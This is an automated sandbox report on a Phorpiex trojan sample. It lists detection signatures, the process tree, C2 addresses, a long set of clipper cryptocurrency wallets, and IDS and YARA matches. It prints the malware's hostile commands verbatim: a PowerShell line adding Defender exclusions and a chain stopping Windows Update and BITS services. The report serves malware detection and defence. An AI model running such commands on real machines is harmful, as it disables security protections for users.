Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bjl3geiFEK.exe

Overview

General Information

Sample name:Bjl3geiFEK.exe
renamed because original name is a hash value
Original sample name:ed9fbbbe548c41479cb70e4d694793d0.exe
Analysis ID:1543742
MD5:ed9fbbbe548c41479cb70e4d694793d0
SHA1:a0bde162d2241ab2acb58544511a41df30a096a7
SHA256:6fc8b5b8a90cf8ba7e0eb930fcdde776f8eeb3f37913318df7766a365e13fa8e
Tags:32exetrojan
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Bjl3geiFEK.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\Bjl3geiFEK.exe" MD5: ED9FBBBE548C41479CB70E4D694793D0)
    • 33080.scr (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\33080.scr" /S MD5: 06560B5E92D704395BC6DAE58BC7E794)
      • sysppvrdnvs.exe (PID: 3060 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • cmd.exe (PID: 4488 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4092 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 7120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 2188 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 2380 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 5940 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6512 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 3620 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6996 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • 818921588.exe (PID: 1516 cmdline: C:\Users\user\AppData\Local\Temp\818921588.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • sysppvrdnvs.exe (PID: 4628 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    C:\Windows\sysppvrdnvs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Temp\33080.scrJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Users\user\AppData\Local\Temp\818921588.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    Click to see the 9 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    18.0.818921588.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      2.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        1.2.33080.scr.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          2.2.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            17.2.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              Click to see the 3 entries

                              Sigma Signatures

                              Operating System Destruction

                              barindex
                              Sigma detected: Stop multiple services
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 3060, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 2188, ProcessName: cmd.exe

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 3060, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 4488, ProcessName: cmd.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 3060, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 4488, ProcessName: cmd.exe
                              Sigma detected: SCR File Write Event
                              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Bjl3geiFEK.exe, ProcessId: 6852, TargetFilename: C:\Users\user\AppData\Local\Temp\33080.scr
                              Sigma detected: Suspicious Screensaver Binary File Creation
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Bjl3geiFEK.exe, ProcessId: 6852, TargetFilename: C:\Users\user\AppData\Local\Temp\33080.scr
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\33080.scr, ProcessId: 7112, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 4092, ProcessName: powershell.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:12.755493+010020220501A Network Trojan was detected185.215.113.6680192.168.2.449730TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:13.063265+010020220511A Network Trojan was detected185.215.113.6680192.168.2.449730TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:23.546010+010020440771A Network Trojan was detected192.168.2.4503455.239.153.19240500UDP
                              2024-10-28T11:11:28.559672+010020440771A Network Trojan was detected192.168.2.4503455.75.95.11440500UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:21.513089+010028032742Potentially Bad Traffic192.168.2.449731185.215.113.6680TCP
                              2024-10-28T11:11:23.515407+010028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                              2024-10-28T11:11:26.495491+010028032742Potentially Bad Traffic192.168.2.44974091.202.233.14180TCP
                              2024-10-28T11:11:29.339713+010028032742Potentially Bad Traffic192.168.2.457562185.215.113.6680TCP
                              2024-10-28T11:11:31.283957+010028032742Potentially Bad Traffic192.168.2.457563185.215.113.6680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:11.839337+010028376771A Network Trojan was detected185.215.113.6680192.168.2.449731TCP
                              2024-10-28T11:11:23.823677+010028376771A Network Trojan was detected185.215.113.6680192.168.2.449734TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-28T11:11:21.513089+010028482951A Network Trojan was detected192.168.2.449731185.215.113.6680TCP
                              2024-10-28T11:11:23.515407+010028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                              2024-10-28T11:11:29.339713+010028482951A Network Trojan was detected192.168.2.457562185.215.113.6680TCP
                              2024-10-28T11:11:31.283957+010028482951A Network Trojan was detected192.168.2.457563185.215.113.6680TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Windows\sysppvrdnvs.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Found malware configuration
                              Source: 2.2.sysppvrdnvs.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeReversingLabs: Detection: 81%
                              Source: C:\Windows\sysppvrdnvs.exeReversingLabs: Detection: 81%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeJoe Sandbox ML: detected
                              Source: C:\Windows\sysppvrdnvs.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040C830
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040C830
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,17_2_0040C830

                              Phishing

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
                              Source: Bjl3geiFEK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                              Source: Bjl3geiFEK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004068E0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_004067A0
